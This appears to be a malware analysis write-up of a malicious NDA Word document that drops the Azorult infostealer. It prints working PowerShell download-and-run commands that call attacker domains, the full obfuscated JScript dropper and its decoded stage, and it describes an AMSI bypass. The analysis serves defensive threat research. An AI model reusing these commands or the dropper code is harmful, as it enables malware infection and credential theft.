Skip to content

Latest commit

 

History

History
105 lines (63 loc) · 4.99 KB

30664f227788820c3f11911676a053655fb114cf6b0ca28a2a3fc9d9968a77ba.md

File metadata and controls

105 lines (63 loc) · 4.99 KB
Raw

13075f41e5390842dfafd6dcfce541ba - Formularz NDA.docx

https://app.any.run/tasks/dd07fca0-f98a-40a1-9e96-8a945907b990/

Annex has ole objects inside that run this

cmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run("""Powershell '(&'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+'t.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://office-cleaner-commander.com/kremlin.js'',''$env:APPDATA''+''Annex.js'')'|IEX; start-process('$env:APPDATA' +'Annex.js')""",0)


office-cleaner-commander.com  - 185.98.87.210

kremlin.js



f="pod|'' nioj- i4uh34uh4uywrhy34higjho$]][rahc[;)77,421,93,93,23,0Kremlin,501,Kremlin1,601,54,23,5Kremlin,4Kremlin,79,401,76,501,501,99,5Kremlin,79,63,23,16,301,0Kremlin,501,4Kremlin,6Kremlin,38,501,501,99,5Kremlin,79,63,95,521,43,59,63,021,84,43,39,101,6Kremlin,121,89,19,39,4Kremlin,79,401,99,19,321,23,6Kremlin,99,101,601,89,97,54,401,99,79,96,4Kremlin,Kremlin1,07,421,23,93,54,93,23,6Kremlin,501,801,2Kremlin,5Kremlin,54,23,121,6Kremlin,63,23,16,5Kremlin,4Kremlin,79,401,76,501,501,99,5Kremlin,79,63,95,6Kremlin,021,101,48,101,5Kremlin,0Kremlin,Kremlin1,2Kremlin,5Kremlin,101,4Kremlin,64,6Kremlin,63,16,121,6Kremlin,63,95,14,04,001,0Kremlin,101,5Kremlin,64,6Kremlin,63,95,14,101,5Kremlin,801,79,201,63,44,93,301,2Kremlin,601,64,701,99,79,6Kremlin,6Kremlin,56,74,901,Kremlin1,99,64,4Kremlin,101,001,0Kremlin,79,901,901,Kremlin1,99,54,4Kremlin,101,0Kremlin,79,101,801,99,54,101,99,501,201,201,Kremlin1,74,74,85,2Kremlin,6Kremlin,6Kremlin,401,93,44,93,48,96,17,93,04,0Kremlin,101,2Kremlin,Kremlin1,64,6Kremlin,63,95,08,48,48,27,67,77,88,64,6Kremlin,201,Kremlin1,5Kremlin,Kremlin1,4Kremlin,99,501,77,23,901,Kremlin1,76,54,23,6Kremlin,99,101,601,89,97,54,9Kremlin,101,87,23,16,6Kremlin,63,95,05"
f=f+",05,2Kremlin,63,23,16,23,801,Kremlin1,99,Kremlin1,6Kremlin,Kremlin1,4Kremlin,08,121,6Kremlin,501,4Kremlin,7Kremlin,99,101,38,85,85,39,4Kremlin,101,301,79,0Kremlin,79,77,6Kremlin,0Kremlin,501,Kremlin1,08,101,99,501,8Kremlin,4Kremlin,101,38,64,6Kremlin,101,87,64,901,101,6Kremlin,5Kremlin,121,38,19,95,14,05,55,84,15,23,44,39,101,2Kremlin,121,48,801,Kremlin1,99,Kremlin1,6Kremlin,Kremlin1,4Kremlin,08,121,6Kremlin,501,4Kremlin,7Kremlin,99,101,38,64,6Kremlin,101,87,64,901,101,6Kremlin,5Kremlin,121,38,19,04,6Kremlin,99,101,601,89,97,Kremlin1,48,85,85,39,901,7Kremlin,0Kremlin,96,19,23,16,23,05,05,2Kremlin,63,95,14,301,0Kremlin,501,2Kremlin,63,04,23,801,501,6Kremlin,0Kremlin,7Kremlin,23,521,6Kremlin,101,501,7Kremlin,18,54,23,94,23,6Kremlin,0Kremlin,7Kremlin,Kremlin1,99,54,23,901,Kremlin1,99,64,101,801,301,Kremlin1,Kremlin1,301,23,2Kremlin,901,Kremlin1,99,54,23,0Kremlin,Kremlin1,501,6Kremlin,99,101,0Kremlin,0Kremlin,Kremlin1,99,54,6Kremlin,5Kremlin,101,6Kremlin,23,16,23,301,0Kremlin,501,2Kremlin,63,321,23,Kremlin1,001,95,101,0Kremlin,Kremlin1,89,48,63,23,77,23,801,79,5Kremlin,95,14,93,37,93,44,93,24,93,04,101,99,79,801,2Kremlin,101,4Kremlin,64,93,88,96,24,93,16,101,0Kremlin,Kremlin1,89,48,63(@=i4uh34uh4uywrhy34higjho$;dc$ pod las;''niOj-]52,62,4[cePsmOc:vne$=dc$"



AT("Powershell " + REVERSE(replaceAll(f)))


var CurrentDirectory =WScript.ScriptFullName

AT("Powershell " +"Remove-Item  '" + CurrentDirectory+"'")


function AT(strCommand){
var strComputer = ".";
   var strCommand = strCommand;
   var objWMIService = GetObject("winmgmts:\\\\" + strComputer +
"\\root\\CIMV2");
   var objProcess = objWMIService.Get("Win32_Process");
   var objInParam =
objProcess.Methods_("Create").inParameters.SpawnInstance_();
   var objStartup =
objWMIService.Get("Win32_ProcessStartup").SpawnInstance_();
   objStartup.ShowWindow = 0;
   objInParam.CommandLine = strCommand;
   objInParam.ProcessStartupInformation = objStartup;
      var objOutParams = objWMIService.ExecMethod( "Win32_Process",
"Create", objInParam );
}

function replaceAll(str) {
    return str.split("Kremlin").join("11");
}

function REVERSE(str) {
    return str.split("").reverse().join("");
}

decoded:

'$Tbone=\'*EX\'.replace(\'*\',\'I\');sal M $Tbone;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $p22;$t= New-Object -Com Microsoft.XMLHTTP;$t.open(\'GET\',\'http://office-cleaner-commander.com/Attack.jpg\',$false);$t.send();$ty=$t.responseText;$asciiChars= $ty -split \'-\' |ForEach-Object {[char][byte]"0x$_"};$asciiString= $asciiChars -join \'\'|M'

This loads Attack.jpg which performs AMSI bypass with an onboard .NET DLL that is gzip compressed

byte[]]$deblindB = UNpaC0k1147555 $blindB

$blind=[System.Reflection.Assembly]::Load($deblindB)
[Amsi]::Bypass()

[byte[]]$decompressedByteArray = UNpaC0k1147555  $MNB

At the end loading an onboard EXE file using a function from the .NET DLL

$t=[System.Reflection.Assembly]::Load($decompressedByteArray)
[rOnAlDo]::ChRiS('control.exe',$MNB2)

The exe is Azorult: https://app.any.run/tasks/cdc6b198-6c78-46eb-acba-d859ddf8cd5e

hxxp://fssshipping[.]com/azo/Panel/index.php

fssshipping.com  -  85.192.35.51